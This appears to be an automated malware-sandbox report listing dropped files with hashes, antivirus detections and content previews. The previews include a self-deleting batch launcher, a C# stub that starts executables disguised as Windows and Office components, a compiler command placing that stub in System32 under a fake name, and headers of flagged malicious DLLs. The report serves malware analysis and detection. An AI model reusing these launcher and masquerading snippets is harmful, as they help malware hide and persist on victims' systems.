                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oltflhxu.3pc.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oycgv03e.3cd.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prqhghm5.3pz.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbrrfiui.1sr.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ru1gjqia.jdf.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujhnaqiq.mzu.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urqail31.nkt.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybjhtdtz.omw.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):176
                                                                Entropy (8bit):5.128558346346246
                                                                Encrypted:false
                                                                SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mDHusoZskWTd1covBktKcKZG1Ukh4E2J5xAIGkvcG:hCRLuVFOOr+DEDChWTZvKOZG1923fzvz
                                                                MD5:7B4F4320B6E51F892FFD5073BC3D621E
                                                                SHA1:7A4F48959B9E78AA6FF6DAB37CDC7CEC86C9B2AF
                                                                SHA-256:FFBFA3D7EE1DEB2439FF3D7D47C821969F07E3755C898D3CF627348D365B3221
                                                                SHA-512:17B7AF37560DDB94ECD592BF2BA8DF90D2C1FB3670B195A502CB156EF02F4B11389EC6ADEB10A1F846A16B71FFD92E9F7C0EB14A0156965F2B16A6E152FE6339
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\emoAWdy2Gj.bat"

                                                                C:\Users\user\AppData\Local\Temp\imeik232\imeik232.0.cs

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):415
                                                                Entropy (8bit):4.989900425210691
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMdBu0qCaiFkD:JNVQIbSfhV7TiFkMSfhWLSMdU0qC7FkD
                                                                MD5:3F21D9EB2D80137DB736BC45959A85B9
                                                                SHA1:0E7EB6CB9AB91F9FFB112E8BA8A4CC13846848A3
                                                                SHA-256:B40ED5F6B1ECDD829D3F7F8927D27A24510BA9BBF251E0742987A79DC934F7FB
                                                                SHA-512:86352207854FE4890E3BABB679BB99778BB61FFAC5EEAD811970A7F46F44D6B88575F65BA1BDC8CFEFDE6A58D76058322FAA117CAC48AF8379380534222F17DF
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.

                                                                C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):251
                                                                Entropy (8bit):5.06010373929633
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923ftA0H:Hu7L//TRq79cQylA0H
                                                                MD5:C7297113F8051D498C4F1CEAFF8DE028
                                                                SHA1:647E7271D8545A97EA9DA5CBA093D1D6DA186FA5
                                                                SHA-256:19D1F15BBE89246B606D21D96E3351415C4FD7A8CE1F1B50F1403A4396F91302
                                                                SHA-512:BA61B75233C4E27563FA9AE30D4CDF646DB5EE6E11B747E5F5608C6EE8FF4964C03880ECEC39E744F90B5DE54DA2C4D8F86F10FCA6885396F66321E6176C3EC2
                                                                Malicious:false
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\imeik232\imeik232.0.cs"

                                                                C:\Users\user\AppData\Local\Temp\imeik232\imeik232.out

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):758
                                                                Entropy (8bit):5.238501033275037
                                                                Encrypted:false
                                                                SSDEEP:12:yZzI/u7L//TRq79cQylA0OKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y9I/un/Vq79tylrOKax5DqBVKVrdFAMb
                                                                MD5:DBDAAA8B97FACF3BDB01837E489D5042
                                                                SHA1:A0B6E62C97C3A0B0ED5688EAECE667BE3C304D9F
                                                                SHA-256:A97B499425F58A8FD9142878DB61F95A5BB2305DD46AAE00F1F28F8A507E30E0
                                                                SHA-512:ABED02E8DD045AFE660E7DF4B9663A5FE2701C14A771CE1B2328A14EF634E9D9C1B88FA8E9995DB20F6CF38A74B503CFCC7BD9AC87F416CCDCE5BEF85253E474
                                                                Malicious:false
                                                                Preview:.C:\msproviderBrokerMonitornet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\imeik232\imeik232.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                C:\Users\user\Desktop\GOHavRZK.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\Qxaqfufs.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):24064
                                                                Entropy (8bit):5.492504448438552
                                                                Encrypted:false
                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\SHwrfMKt.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.41854385721431
                                                                Encrypted:false
                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ZndYtGLf.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32256
                                                                Entropy (8bit):5.631194486392901
                                                                Encrypted:false
                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\alFgOGaa.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                C:\Users\user\Desktop\kTYwyifI.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                C:\Users\user\Desktop\qMBWbOkw.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23552
                                                                Entropy (8bit):5.519109060441589
                                                                Encrypted:false
                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\a5e29c0f5e55d1

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with very long lines (723), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):723
                                                                Entropy (8bit):5.885184387441015
                                                                Encrypted:false
                                                                SSDEEP:12:iMn8oSjN5ASB5n5fYMxBuOMwld5MTfydIYfdIc3emkyStWzAPu8Ge3dQFrMO:3n8oSw+hyO+TaIYfd73emkyS1m5GdwV
                                                                MD5:EB8756B0109F356CCDBCA1D2BD2F1E9E
                                                                SHA1:92017AF490F9DD01F535F0E50CD841BD5F09683A
                                                                SHA-256:25E05B868618129AC25803A7F7D261A57F5E1E0520DF7151D58DCAFBA44AF60C
                                                                SHA-512:5A16267B1C5803B06924D6CB7CBA102C4BCA37F7F90DEEC96E06D6426A4DB32BD93FA72BB3107438B04A5B6615F5070F578CC25C0AA5C0D6F98E1568888E04D8
                                                                Malicious:false
                                                                Preview:5F19r8pd1f2RTFzcq8WbbyFfALIFURi8fKoEDeJaMPEOyfOjb4lswiQGAV8gzkJk73wIavYMz5PMu0rf7inaqzM74iDsfmlmGeR4tFJqfZ21TEWJndjQ7s4HryO1rpqNUmFPjww1Z64R6UozM4ECDUpXkJN40R8zsphq8Gj1rr0AynLXKYpxlnJ96spZj1BI8EiQw71GVNVWdpi780uclLOEghtQaJRzpsBuE4kMhjbXSwgRJsbtHjhxzduPOlpL5fqvny2EPi4Ct1wuAcGrsisGLO4lKV853QbxFvnU0XdjoeD8r9Owe8dXxkjY4R34k9Jca9oPyw1UFIcqL64KGLa4xD9fLPajdi9oVkisV97sHIRoH3N8XtyYiOpW9JDjVR1gJxVkYLzHOsxowUXSBcMuulGG5LsM5YWzRufThnkL3qJ0aAkovvh3FGwirOpMcmLzV8XBzDuX2A0DbPp4lEaK1ctK86mT8XsQfUfcmjzrAKBEPtHcjukYLB82ONC2bbZeSjiGtMRCOtJqbp4OzKuNwTFdWnOZg6QjvhwqKAsWdiKc1RbiSxDRqLr8eEtG82gSdj533OEybXuOJmmFLpGs382j0xLGQlYkB19RVhpEtOzSacz2co4SvxZeqWDGC7i09JNRnUto9B8oJjIX7TnmqFyNcek9ejBvq9TRPhPH4QSuzuVHNpItT5J4U9zItuJaAM8JQ1HaEgsZwEY

                                                                C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):1224
                                                                Entropy (8bit):4.435108676655666
                                                                Encrypted:false
                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
